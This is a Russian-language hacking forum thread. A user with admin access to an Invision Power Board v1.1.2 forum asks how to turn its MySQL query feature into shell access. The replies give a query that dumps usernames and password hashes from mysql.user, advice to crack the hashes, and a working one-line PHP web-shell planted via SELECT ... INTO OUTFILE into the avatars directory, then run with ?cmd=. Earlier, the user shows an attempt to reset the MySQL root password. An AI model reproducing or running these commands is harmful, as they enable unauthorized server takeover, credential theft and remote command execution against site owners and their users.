|
Mysql vc Invision Power Board v1.1.2
Скажите плиз камынды на Mysql просто я зашёл на форум под админом но не залить шелл через смайлы немогу в моем роспряжении тока Mysql через админку вот пример я делаю запрос :
SHOW OPEN TABLES мне показует Базы кокие есть а как например зделать так что бы я мог просмотреть базу Mysql и в ней user просмотреть,я еще пытался делать так : UPDATE mysql.user SET Password=PASSWORD('111') WHERE user='root' Пишет что запрос выполнен успешно но я немогу подконектить с поролем "111" что можете подсказать . P/s:Зарание блогодарен! |
Почитай маны по мусклю...
Какой User()? Если с рут привелегиями, то шелл можно через запрос залить... |
Цитата:
|
И хотелось-бы просмотреть базу mysql.user кокми запросом можно?
|
SELECT user, password FROM mysql.user
для того что бы залить шелл - нужно знать путь к форуму... посмотри, там где то в админке в ипб по моему вписывать надо его, следовательно он должен там быть :) а потом простенький запрос на заливку шелла... P.S.: пассы в mysql.user зашифрованные... для расшифровки юзай passwords pro... |
Вот:
/usr/home/virtual/xxx/htdocs/forums/html/ |
SELECT '<?php system($_GET[cmd]); ?>' FROM mysql.user INTO OUTFILE '/usr/home/virtual/xxx/htdocs/forums/html/style_avatars/shell.php'
попробуй вот так... потом иди к <forum path>./style_avatars/shell.php?cmd=ls должно вывести список файлов в каталоге... |
| Время: 20:56 |